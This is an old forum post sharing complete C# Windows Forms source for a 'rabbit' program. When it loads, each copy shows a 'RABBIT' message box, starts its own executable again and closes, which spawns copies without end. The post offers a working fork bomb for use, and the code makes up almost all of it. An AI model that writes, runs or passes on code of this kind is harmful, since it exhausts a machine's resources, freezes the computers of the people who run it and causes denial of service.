Posted June 4, 201015 yr //JMC31337//THE MAIN FORM CODEusing System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Windows.Forms;using System.Diagnostics;namespace WindowsFormsApplication1{ public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { string startpointPath = Application.ExecutablePath; for (int x = 0; x < 999999999; x++) { MessageBox.Show("RABBIT", "Attention"); Process.Start(startpointPath); Close(); //CLOSE 1 SPAWN 999999999 } System.Environment.Exit(111); //AVOID FORM BOX } }} Edited December 15, 201014 yr by JMC31337
Create an account or sign in to comment